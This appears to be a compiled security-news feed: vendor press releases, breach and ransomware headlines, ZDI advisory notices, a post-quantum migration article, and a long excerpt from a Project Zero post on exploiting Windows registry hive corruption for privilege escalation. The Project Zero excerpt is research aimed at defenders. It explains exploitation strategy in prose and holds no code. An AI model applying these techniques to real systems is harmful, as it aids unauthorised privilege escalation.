Zero-day vulnerabilities are the bogeymen of cybersecurity. They lurk unseen in our systems until the moment of exploitation, leaving defenders with no time to prepare. Our goal at RunSafe is to give defenders a leg up against attackers, so we wondered: What if we could quantify this seemingly unquantifiable risk? What if we could take […] The post Reducing Your Exposure to the Next Zero Day: A New Path Forward appeared first on RunSafe Security.

By integrating intelligent network policies, zero-trust principles, and AI-driven insights, enterprises can create a robust defense against the next generation of cyber threats.

Cybersecurity researchers have taken the wraps off an unusual cyber attack that leveraged malware with corrupted DOS and PE headers, according to new findings from Fortinet. The DOS (Disk Operating System) and PE (Portable Executable) headers are essential parts of a Windows PE file, providing information about the executable. While the DOS header makes the executable file backward compatible...

The acquisition of Apex Security adds a powerful new layer of visibility, context and control to the Tenable One Exposure Management Platform to govern usage, enforce policy and control exposure across both the AI that organizations use and the AI they build.Over the past 25 years, we’ve seen the attack surface shift dramatically — from traditional on-prem environments to cloud, to OT/IOT, and more. But the changes we’re seeing right now with AI feel different. Faster. More disruptive. And, frankly, more unpredictable.That’s why I’m excited to share that Tenable has signed a definitive agreement to acquire Apex Security, a company we’ve been following for some time. They've built a powerful product that solves real problems in the emerging world of AI risk. Their focus is helping organizations secure both the AI they use and the AI they build — a problem that's becoming more critical every day.It’s clear we’re in the early stages of a major shift. Developers are integrating large language models into products and internal tools. Employees are using generative tools in everyday workflows. AI is everywhere — but the tools to manage that risk at scale? Not so much.Last year, we introduced AI Aware to help organizations get visibility into shadow AI. It’s been incredible to see how quickly customers adopted it — more than 6,400 customers in over 100 countries are using it today. But we also heard loud and clear: visibility isn’t enough. Security leaders want to govern usage, enforce policy, and prevent exposures before attackers take advantage. That’s exactly what Apex was built to do.Their technology adds a powerful layer of visibility, context, and control to what we’re building with Tenable One - our exposure management platform for your entire enterprise. Once the deal closes, we will move quickly to integrate these capabilities into the platform.This isn’t just about adding another feature — it’s about helping customers take action during a critical window of time. Most organizations haven’t yet experienced a large-scale AI-driven attack. That’s the point. We have a unique opportunity to get ahead of the threat — to define how AI is secured before attackers define it for us.I’m proud of the team at Tenable for continuing to lead in Exposure Management, and I’m looking forward to welcoming our future teammates from Apex once the deal closes. This is how we stay in front of the attack surface — by seeing where it’s going, and building for it now.More to come soon.

It?s only a matter of time before attackers find a crack in your security armour. Learn how to combine resilience with compliance and protect what matters most.

Symantec Endpoint Security Complete and Carbon Black Cloud earn coveted AAA rating by scoring 100% for detecting and blocking hundreds of ransomware attacks

Commvault webinar offers insights on creating strategies for rapid cyber recovery. The post Thrive in Chaos: How to Get Your Minimum Viable Company Back Online appeared first on Commvault - English - United States.

Tenable® Holdings, Inc., the exposure management company, today announced its intent to acquire Apex Security, Inc., an innovator in securing the rapidly expanding AI attack surface. Tenable believes the acquisition, once completed, will strengthen Tenable’s ability to help organizations identify and reduce cyber risk in a world increasingly shaped by artificial intelligence. Generative AI tools and autonomous systems are rapidly expanding the attack surface and introducing new risks — from shadow AI apps and AI-generated code to synthetic identities and ungoverned cloud services. In 2024, Tenable launched Tenable AI Aware which already helps thousands of organizations detect and assess AI usage across their environments. Adding Apex capabilities will expand on that foundation — adding the ability to govern usage, enforce policy, and control exposure across both the AI that organizations use and the AI they build. This move reinforces Tenable’s long-standing strategy of delivering scalable, unified exposure management as AI adoption accelerates.“AI dramatically expands the attack surface, introducing dynamic, fast-moving risks most organizations aren’t prepared for,” said Steve Vintz, Co-CEO and CFO, Tenable. “Tenable’s strategy has always been to stay ahead of attack surface expansion — not just managing exposures, but eliminating them before they can be exploited.”“As organizations move quickly to adopt AI, many recognize that now is the moment to get ahead of the risk — before large-scale attacks materialize,” said Mark Thurmond, Co-CEO, Tenable. “Apex delivers the visibility, context, and control security teams need to reduce AI-generated exposure proactively. It will be a powerful addition to the Tenable One platform and a perfect fit for our preemptive approach to cybersecurity.”Founded in 2023, Apex attracted early interest from CISOs and top investors, including Sam Altman (OpenAI), Clem Delangue (Hugging Face), and venture capital firms Sequoia Capital and Index Ventures. The company quickly emerged as an innovator in securing the use of AI by developers and everyday employees alike — addressing the growing need to manage usage, enforce policy, and ensure compliance at scale. “The AI attack surface is deeply intertwined with everything else organizations are already securing. Treating it as part of exposure management is the most strategic approach. We’re excited to join forces with Tenable to help customers manage AI risk in context — not as a silo, but as part of their broader environment,” said Matan Derman, CEO and Co-Founder of Apex Security.Following the acquisition close, Tenable expects to deliver integrated capabilities in the second half of 2025 as part of Tenable One — the industry’s first and most comprehensive exposure management platform. The financial terms of the deal were not disclosed. The deal is expected to close later this quarter.About TenableTenable® is the exposure management company, exposing and closing the cybersecurity gaps that erode business value, reputation and trust. The company’s AI-powered exposure management platform radically unifies security visibility, insight and action across the attack surface, equipping modern organizations to protect against attacks from IT infrastructure to cloud environments to critical infrastructure and everywhere in between. By protecting enterprises from security exposure, Tenable reduces business risk for approximately 44,000 customers around the globe. Learn more at tenable.com. Forward-Looking StatementsThis press release contains forward-looking information related to Tenable, and its acquisition of Apex Security that involves substantial risks, uncertainties and assumptions that could cause actual results to differ materially from those expressed or implied by such statements. You can generally identify forward-looking statements by the use of forward-looking terminology such as the words: “anticipate,” “believe,” “continue,” “could,” “estimate,” “expect,” “explore,” “evaluate,” “intend,” “may,” “might,” “plan,” “potential,” “predict,” “project,” “seek,” “should,” or “will,” or the negative thereof or other variations thereon or comparable terminology. The forward-looking statements in this press release are based on Tenable’s current plans, objectives, estimates, expectations and intentions and inherently involve significant risks and uncertainties, many of which are beyond Tenable’s control. Forward-looking statements in this communication include, among other things, statements about the potential benefits of the acquisition and product developments and other possible or assumed business strategies, potential growth opportunities, new products, the intended timing of integration of Apex Security’s offerings into Tenable One, and potential market opportunities. Risks and uncertainties include, among other things, our ability to successfully integrate Apex Security’s operations; our ability to implement our plans, forecasts and other expectations with respect to Apex Security’s business; our ability to realize the anticipated benefits of the acquisition, including the possibility that the expected benefits from the acquisition will not be realized or will not be realized within the expected time period; disruption from the acquisition making it more difficult to maintain business and operational relationships; the inability to retain key employees; the negative effects of the consummation of the acquisition on the market price of our common stock or on our operating results; unknown liabilities; attracting new customers and maintaining and expanding our existing customer base; our ability to scale and update our platform to respond to customers’ needs and rapid technological change, increased competition on our market and our ability to compete effectively, and expansion of our operations and increased adoption of our platform internationally.Additional risks and uncertainties that could affect our financial results are included in the section titled “Risk Factors” and “Management’s Discussion and Analysis of Financial Condition and Results of Operations” in our Annual Report on Form 10-K for the year ended December 31, 2024, our Quarterly Report on Form 10-Q for the quarter ended March 31, 2025 and other filings that we make from time to time with the Securities and Exchange Commission (SEC) which are available on the SEC’s website at www.sec.gov. In addition, any forward-looking statements contained in this communication are based on assumptions that we believe to be reasonable as of this date. Except as required by law, we assume no obligation to update these forward-looking statements, or to update the reasons if actual results differ materially from those anticipated in the forward-looking statements.###Contact Information:Investor Relationsinvestors@tenable.comMedia RelationsTenabletenablepr@tenable.com

Law enforcement crackdowns are gathering pace but online marketplaces still teeming with valuable tokens A VPN vendor says billions of stolen cookies currently on sale either on dark web or Telegram-based marketplaces remain active and exploitable.

Wendi Whitmore spoke on a panel of witnesses at a field hearing at Stanford’s Hoover Institution on May 28, outlining the AI innovations our team developed. The post Improving National Security Through Secure AI appeared first on Palo Alto Networks Blog.

Cisco Secure Access - DNS Defense is a seamless pathway to our Universal ZTNA solution. Learn how it works in the blog.

Security leaders discuss the implications of the Adidas data breach.

Many CVEs represent no risk in a cloud container environment, researchers claim

Identity-based threats continue to rise in frequency and sophistication. Already, more than three-quarters of breaches are identity-based, making it even […]

TCC Bypass vulnerability has been found in three macOS applications: Poedit (CVE-2025-4280), Viscosity (CVE-2025-4412), DaVinci Resolve (CVE-2025-4081)

A flaw in a third-party device management tool appears to be the source of the incident

The threat actors behind the DragonForce ransomware gained access to an unnamed Managed Service Provider's (MSP) SimpleHelp remote monitoring and management (RMM) tool, and then leveraged it to exfiltrate data and drop the locker on multiple endpoints. It's believed that the attackers exploited a trio of security flaws in SimpleHelp (CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726) that were...

In an era where cyber threats are relentless and constantly evolving, where regulatory and industry requirements keep increasing, and where unstaffed information security roles remain a challenge, businesses cannot afford to rely solely on traditional security measures. The complexity of modern security operations requires a proactive approach—one that ensures round-the-clock protection, augments internal capabilities, and seamlessly integrates with multiple vendor products. This is precisely where Managed Security Services (MSS), SOC-as-a-Service, and Managed Detection & Response (MDR) come into play. Industry trends and statistics Recent data highlights the growing reliance on managed security services to address cybersecurity challenges. According to industry research*, a significant number - 29% - of organizations have added MSS solutions to augment their security teams: 23% of organizations are centralizing resources to optimize security operations. 28% are divesting the security team or reducing staff. 37% report no significant changes, indicating a potential gap in security preparedness. These trends underscore the critical need for MSS, SOC-as-a-Service, and MDR solutions to enhance security resilience and mitigate risks effectively. 24x7 Managed Security Services monitoring: why it’s a must Cyber threats don’t take breaks, and neither should your security. Organizations often struggle with maintaining a fully operational Security Operations Center (SOC) that runs efficiently 24/7. MSS and SOC-as-a-Service provide continuous monitoring, threat detection, and incident response, ensuring that potential risks are identified and mitigated before they cause damage. Cost savings: a smarter approach to cybersecurity Maintaining an in-house SOC can be prohibitively expensive, requiring investments in: Technology stack costs including SIEM Retaining skilled personnel for 24x7 operation Certifications, training and compliance Threat research, threat intelligence and forensic capabilities High availability infrastructure and facilities Many organizations, particularly small and mid-sized businesses (SMBs), struggle to allocate resources for full-scale SOC operations. MSS, SOC-as-a-Service and MDR allow companies to outsource cybersecurity expertise without sacrificing quality, often cutting costs by up to 50% compared to an in-house SOC. Additionally, with predictable monthly pricing, organizations can scale security operations efficiently without unexpected budget overruns. Managed Security Services complementing internal teams Many businesses have IT teams tasked with security, but these teams often lack specialized cybersecurity expertise or resources to handle advanced persistent threats (APTs) and complex attack vectors. MSS, SOC-as-a-Service, and MDR solutions complement internal staff by acting as an extension of their security operations, providing additional expertise, automation, and threat intelligence that would otherwise be difficult to maintain in-house. Seamless integration with vendor products With a myriad of cybersecurity tools available today, businesses often struggle with product compatibility and integration. The right MSS, SOC-as-a-Service and MDR providers ensure that your security architecture works harmoniously with vendor products, eliminating gaps in visibility and enforcement while maximizing the value of existing security investments. Compliance benefits: meeting regulatory requirements As cybersecurity risks increase, regulatory compliance has become a top priority for businesses across industries. Organizations handling sensitive data must adhere to frameworks such as: General Data Protection Regulation (GDPR) Health Insurance Portability and Accountability Act (HIPAA) Payment Card Industry Data Security Standard (PCI DSS) Failure to comply with security regulations can result in hefty fines, legal consequences, and reputational damage. MSS, SOC-as-a-Service and MDR help businesses stay compliant by ensuring continuous monitoring, risk assessments, and detailed security reporting. Additionally, many outsourced services enhance audit readiness by offering forensic analysis capabilities, ensuring organizations can respond effectively to regulatory inquiries. The MSS power of OpenText MxDR One standout solution in the MDR space is OpenText Managed Extended Detection and Response (MxDR). OpenText MxDR provides comprehensive 24x7x365 security monitoring, leveraging machine learning and MITRE ATT&CK® behavioral analytics to detect and respond to threats in real time. With a 99% detection rate and low false positives, OpenText MxDR ensures businesses can identify and neutralize cyber threats before they escalate. Additionally, OpenText MxDR boasts an impressive mean time to detect with its EDR Agents, significantly reducing the window of opportunity for attackers. By integrating advanced threat intelligence and endpoint security, OpenText MxDR delivers proactive defense mechanisms that safeguard businesses from emerging threats. Want to learn more about how OpenText MxDR protects your endpoints? Discover how it delivers real-time response, advanced analytics, and endpoint resilience in today’s complex cyber landscape—read the full article. Final thoughts: proactive security is the future Cybersecurity is no longer just about reacting to threats—it’s about proactively defending against them. Managed Security Services, SOC-as-a-Service, and MDR are indispensable components of a modern security strategy, enabling businesses to stay ahead of threats while optimizing internal resources. If your organization hasn’t yet considered these solutions, now is the time. Investing in expert-led security services can mean the difference between a resilient security posture and a costly breach. Ready to take the next step? Let’s secure the future, together. Contact us to learn more. * Source: S&P Global Market Intelligence presentation at RSAC 2025 The post Why Managed Security Services are essential in today’s cyber landscape appeared first on OpenText Blogs.

Customs and Border Protection has swabbed the DNA of migrant children as young as 4, whose genetic data is uploaded to an FBI-run database that can track them if they commit crimes in the future.

The new strategic partnership includes the launch of the LogMeIn Data Protection Suite powered by Acronis

Cisco Talos has uncovered new threats, including ransomware like CyberLock and Lucky_Gh0$t, and a destructive malware called Numero, all disguised as legitimate AI tool installers to target victims.

The phishing operation is using Telegram groups to sell a phishing-as-a-service kit with customer service, a mascot, and infrastructure that requires little technical knowledge to install.

Sick of paying the US tech tax and relinquishing talent to other continents, politicians finally wake up The European Commission (EC) has kicked off a scheme to make Europe a better place to nurture global technology businesses, providing support throughout their lifecycle, from startup through to maturity.

Google on Wednesday disclosed that the Chinese state-sponsored threat actor known as APT41 leveraged a malware called TOUGHPROGRESS that uses Google Calendar for command-and-control (C2). The tech giant, which discovered the activity in late October 2024, said the malware was hosted on a compromised government website and was used to target multiple other government entities. "Misuse of cloud...

Cybersecurity researchers have disclosed a critical unpatched security flaw impacting TI WooCommerce Wishlist plugin for WordPress that could be exploited by unauthenticated attackers to upload arbitrary files. TI WooCommerce Wishlist, which has over 100,000 active installations, is a tool to allow e-commerce site customers to save their favorite products for later and share the lists on social...

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 8.1 AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Mas Fadilullah dzaki' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Jason McFadyen of Trend Research' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Jason McFadyen of Trend Research' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Jason McFadyen of Trend Research' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Jason McFadyen of Trend Research' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 5.5 AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L severity vulnerability discovered by 'Jason McFadyen of Trend Research' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.3 AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Sharkkcode and Zeze with TeamT5' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-08-27 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'kimiya' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'kimiya' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

A CVSS score 4.3 AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N severity vulnerability discovered by 'Hossein Lotfi (@hosselot) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-29, 8 days ago. The vendor is given until 2025-09-26 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Linux Kernel. Authentication is not required to exploit this vulnerability, but only systems with ksmbd enabled are vulnerable. The ZDI has assigned a CVSS rating of 6.8. The following CVEs are assigned: CVE-2025-22037.

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected Sonos Era 300 speakers. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-1051.

Many properties still rely on brass keys, manual processes, and disconnected digital tools, all of which appear functional but quietly create operational drag.

Introducing the Custodial Stablecoin Rekt Test; a new spin on the classic Rekt Test for evaluating the security maturity of stablecoin issuers.

Vulnerability Discovery in Schneider Modicon M241 PLC by OPSWAT Unit 515

May 28, 2025The Hacker NewsIdentity Theft / Enterprise Security Stealer malware no longer just steals passwords. In 2025, it steals live sessions—and attackers are moving faster and more efficiently than ever. While many associate account takeovers with personal services, the real threat is unfolding in the enterprise. Flare’s latest research, The Account and Session Takeover […]

May 28, 2025Ravie LakshmananRansomware / Data Breach An Iranian national has pleaded guilty in the U.S. over his involvement in an international ransomware and extortion scheme involving the Robbinhood ransomware. Sina Gholinejad (aka Sina Ghaaf), 37, and his co-conspirators are said to have breached the computer networks of various organizations in the United States and […]

The post Why Critical Infrastructure Organizations Need Advanced Email Security Now More Than Ever appeared first on Open Systems.

Knickers outlet knackered Underwear retailer Victoria's Secret’s website has been down for three days, with the company blaming an unspecified security problem.

The financial sector is adept at balancing risk and opportunity. Adversarial AI is its next big challenge Sponsored Post  From the use of ATMs to online banking, the financial services sector has always been at the forefront of technology. Now, it's leading the charge in AI. In their third annual survey of financial institutions the Bank of England and Financial Conduct Authority found 75% of companies already using AI with another 10% planning to do so over the next three years.

Improving evidence handling and investigation speed with secure, automated file analysis.

Gartner names Vectra AI a Leader in Network Detection & Response – positioned highest for Ability to Execute and furthest for Completeness of Vision

Researchers are using quantum computers to generate keys that are truly random to strengthen data encryption.

Why is a cute Star Wars fan website now redirecting to the CIA? How come Cambodia has become the world's hotspot for scam call centres? And can a WhatsApp image really drain your bank account with a single download, or is it just a load of hacker hokum? All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Allan Liska.

It's no secret that cyberthreats against financial institutions are growing more sophisticated. In a 2024 story from the IMF,  they showed that losses from cyber incidents quadrupled since 2017, inflating to $2.5 billion.

Backdoor giving full administrative control can survive reboots and firmware updates.

Horizon3.ai, a cybersecurity startup that provides tools like autonomous penetration testing, is seeking to raise $100 million in a new funding round and has locked down at least $73 million, the company revealed in an SEC filing this week. NEA led the round, according to two people familiar with the deal. One person said that […]

The fashion retailer's outages began Monday.

As estimates of the quantum computing power needed to crack current public key encryption algorithms continue to drop, a group of technology companies and organizations is urging users to begin migrating toward post-quantum cryptographic standards now. To help organizations with the transition to post-quantum cryptography, the Post-Quantum Cryptography Coalition (PQCC) released a migration roadmap today to guide companies through the phases of that journey. “As quantum computing technology continues to advance, organizations cannot afford to delay preparing for these transformative changes and threats to their security,” Wen Masters, MITRE’s vice president of cyber technologies, said in a statement. MITRE is one of the founding members of PQCC, along with SandboxAQ, PQShield, IBM Quantum and Microsoft. The roadmap’s release comes just days after the publication of a paper that reduced by more than 95% the estimated quantum computing power needed to crack RSA-2048 encryption keys. Quantum Computing Power Needed to Crack RSA-2048 Lowered That paper, by Craig Gidney of Google Quantum AI, updates a 2019 paper Gidney co-authored that estimated that 2048-bit RSA integers could be broken in eight hours by a quantum computer with 20 million noisy qubits. “In this paper, I substantially reduce the number of qubits required,” Gidney wrote in the new paper published on arXiv. “I estimate that a 2048 bit RSA integer could be factored in less than a week by a quantum computer with less than a million noisy qubits.” In a blog post on the paper, Gidney said that current quantum computers with relevant error rates “have on the order of only 100 to 1000 qubits,” and the National Institute of Standards and Technology (NIST) is leading efforts to develop post-quantum cryptographic algorithms “that are expected to be resistant to future large-scale quantum computers. However, this new result does underscore the importance of migrating to these standards in line with NIST recommended timelines.” In a November 2024 report, NIST said that “even if quantum computers are a decade away, organizations must begin the migration to postquantum cryptography today to avoid having their encrypted data exposed once quantum computers become operational in the future.” While certain applications may require post-quantum cryptography (PQC) sooner, NIST and U.S. federal systems have set an “overall goal of achieving widespread PQC adoption by 2035.” In an April update, PQCC noted that only three PQC standards have seen “some adoption” so far: SSH, TLS 1.3, and IKE/IPSec. Here is PQCC’s standards adoption heatmap: [caption id="attachment_103094" align="aligncenter" width="1333"] Post-quantum cryptography standards development and adoption (PQCC)[/caption] Post-Quantum Cryptography Migration Roadmap The 20-page PQCC migration roadmap details four migration phases to help CIOs and CISOs “act decisively, taking proactive steps to protect sensitive data now and in the future.” Those migration phases are: Preparation: Starting with an overview of an organization’s PQC migration aims, assigning a migration lead, identifying stakeholders, “and aligning stakeholders through strategic messaging.” Baseline Understanding: Gathering a baseline understanding of an organization’s data inventory, prioritizing assets to be updated, and establishing required resources and available budget. Planning and Execution: Collaborating with system vendors and internal system owners “to ensure that post-quantum solutions are acquired externally or developed internally and implemented effectively.” Monitoring and Evaluation: Developing measures for tracking migration process and formulating a process “for reassessing cryptographic security as quantum capabilities evolve.” “The process outlined in this roadmap underscores the importance of strategic planning, stakeholder alignment, and continuous monitoring and documentation to adapt to technological advancements and maintain robust security postures,” the migration document concludes. “As the quantum computing landscape continues to evolve, organizations must remain adaptable, tracking updates in guidance to maintain a secure PQC transition.”

Data analytics and risk management biz says software dev platform breached, not itself LexisNexis Risk Solutions (LNRS) is the latest big-name organization to disclose a serious cyberattack leading to data theft, with the number of affected individuals pegged at 364,333.

Posted by Mateusz Jurczyk, Google Project Zero In the previous blog post, we focused on the general security analysis of the registry and how to effectively approach finding vulnerabilities in it. Here, we will direct our attention to the exploitation of hive-based memory corruption bugs, i.e., those that allow an attacker to overwrite data within an active hive mapping in memory. This is a class of issues characteristic of the Windows registry, but universal enough that the techniques described here are applicable to 17 of my past vulnerabilities, as well as likely any similar bugs in the future. As we know, hives exhibit a very special behavior in terms of low-level memory management (how and where they are mapped in memory), handling of allocated and freed memory chunks by a custom allocator, and the nature of data stored there. All this makes exploiting this type of vulnerability especially interesting from the offensive security perspective, which is why I would like to describe it here in detail. Similar to any other type of memory corruption, the vast majority of hive memory corruption issues can be classified into two groups: spatial violations (such as buffer overflows): and temporal violations, such as use-after-free conditions: In this write up, we will aim to select the most promising vulnerability candidate and then create a step-by-step exploit for it that will elevate the privileges of a regular user in the system, from Medium IL to system-level privileges. Our target will be Windows 11, and an additional requirement will be to successfully bypass all modern security mitigations. I have previously presented on this topic at OffensiveCon 2024 with a presentation titled "Practical Exploitation of Registry Vulnerabilities in the Windows Kernel", and this blog post can be considered a supplement and expansion of the information shown there. Those deeply interested in the subject are encouraged to review the slides and recording available from that presentation.Where to start: high-level overview of potential options Let's start with a recap of some key points. As you may recall, the Windows registry cell allocator (i.e., the internal HvAllocateCell, HvReallocateCell, and HvFreeCell functions) operates in a way that is very favorable for exploitation. Firstly, it completely lacks any safeguards against memory corruption, and secondly, it has no element of randomness, making its behavior entirely predictable. Consequently, there is no need to employ any "hive spraying" or other similar techniques known from typical heap exploitation – if we manage to achieve the desired cell layout on a test machine, it will be reproducible on other computers without any additional steps. A potential exception could be carrying out attacks on global, shared hives within HKLM and HKU, as we don't know their initial state, and some randomness may arise from operations performed concurrently by other applications. Nevertheless, even this shouldn't pose a particularly significant challenge. We can safely assume that arranging the memory layout of a hive is straightforward, and if we have some memory corruption capability within it, we will eventually be able to overwrite any type of cell given some patience and experimentation. The exploitation of classic memory corruption bugs typically involves the following steps: Initial memory corruption primitive?????????Profit (in the form of arbitrary code execution, privilege escalation, etc.) The task of the exploit developer is to fill in the gaps in this list, devising the intermediate steps leading to the desired goal. There are usually several such intermediate steps because, given the current state of security and mitigations, vulnerabilities rarely lead directly from memory corruption to code execution in a single step. Instead, a strategy of progressively developing stronger and stronger primitives is employed, where the final chain might look like this, for instance: In this model, the second/third steps are achieved by finding another interesting object, arranging for it to be allocated near the overwritten buffer, and then corrupting it in such a way as to create a new primitive. However, in the case of hives, our options in this regard seem limited: we assume that we can fully control the representation of any cell in the hive, but the problem is that there is no immediately interesting data in them from an exploitation point of view. For example, the regf format does not contain any data that directly influences control flow (e.g., function pointers), nor any other addresses in virtual memory that could be overwritten in some clever way to improve the original primitive. The diagram below depicts our current situation: Does this mean that hive memory corruption is non-exploitable, and the only thing it allows for is data corruption in an isolated hive memory view? Not quite. In the following subsections, we will carefully consider various ideas of how taking control of the internal hive data can have a broader impact on the overall security of the system. Then, we will try to determine which of the available approaches is best suited for use in a real-world exploit.Intra-hive corruption Let's start by investigating whether overwriting internal hive data is as impractical as it might initially seem.Performing hive-only attacks in privileged system hives To be clear, it's not completely accurate to say that hives don't contain any data worth overwriting. If you think about it, it's quite the opposite – the registry stores a vast amount of system configuration, information about registered services, user passwords, and so on. The only issue is that all this critical data is located in specific hives, namely those mounted under HKEY_LOCAL_MACHINE, and some in HKEY_USERS (e.g., HKU\.Default, which corresponds to the private hive of the System user). To be able to perform a successful attack and elevate privileges by corrupting only regf format data (without accessing other kernel memory or achieving arbitrary code execution), two conditions must be met: The vulnerability must be triggerable solely through API/system calls and must not require binary control over the hive, as we obviously don't have that over any system hive.The target hive must contain at least one key with permissive enough access rights that allow unprivileged users to create values (KEY_SET_VALUE permission) and/or new subkeys (KEY_CREATE_SUB_KEY). Some other access rights might also be necessary, depending on the prerequisites of the specific bug. Of the two points above, the first is definitely more difficult to satisfy. Many hive memory corruption bugs result from a strange, unforeseen state in the hive structures that can only be generated "offline", starting with full control over the given file. API-only vulnerabilities seem to be relatively rare: for instance, of my 17 hive-based memory corruption cases, less than half (specifically 8 of them) could theoretically be triggered solely by operations on an existing hive. Furthermore, a closer look reveals that some of them do not meet other conditions needed to target system hives (e.g., they only affect differencing hives), or are highly impractical, e.g., require the allocation of more than 500 GB of memory, or take many hours to trigger. In reality, out of the wide range of vulnerabilities, there are really only two that would be well suited for directly attacking a system hive: CVE-2023-23420 (discussed in the "Operating on subkeys of transactionally renamed keys" section of the report) and CVE-2023-23423 (discussed in "Freeing a shallow copy of a key node with CmpFreeKeyByCell"). Regarding the second issue – the availability of writable keys – the situation is much better for the attacker. There are three reasons for this: To successfully carry out a data-only attack on a system key, we are usually not limited to one specific hive, but can choose any that suits us. Exploiting hive corruption in most, if not all, hives mounted under HKLM would enable an attacker to elevate privileges.The Windows kernel internally implements the key opening process by first doing a full path lookup in the registry tree, and only then checking the required user permissions. The access check is performed solely on the security descriptor of the specific key, without considering its ancestors. This means that setting overly permissive security settings for a key automatically makes it vulnerable to attacks, as according to this logic, it receives no additional protection from its ancestor keys, even if they have much stricter access controls.There are a large number of user-writable keys in the HKLM\SOFTWARE and HKLM\SYSTEM hives. They do not exist in HKLM\BCD00000000, HKLM\SAM, or HKLM\SECURITY, but as I mentioned above, only one such key is sufficient for successful exploitation. To find specific examples of such publicly accessible keys, it is necessary to write custom tooling. This tooling should first recursively list all existing keys within the low-level \Registry\Machine and \Registry\User paths, while operating with the highest possible privileges, ideally as the System user. This will ensure that the process can see all the keys in the registry tree – even those hidden behind restricted parents. It is not worth trying to enumerate 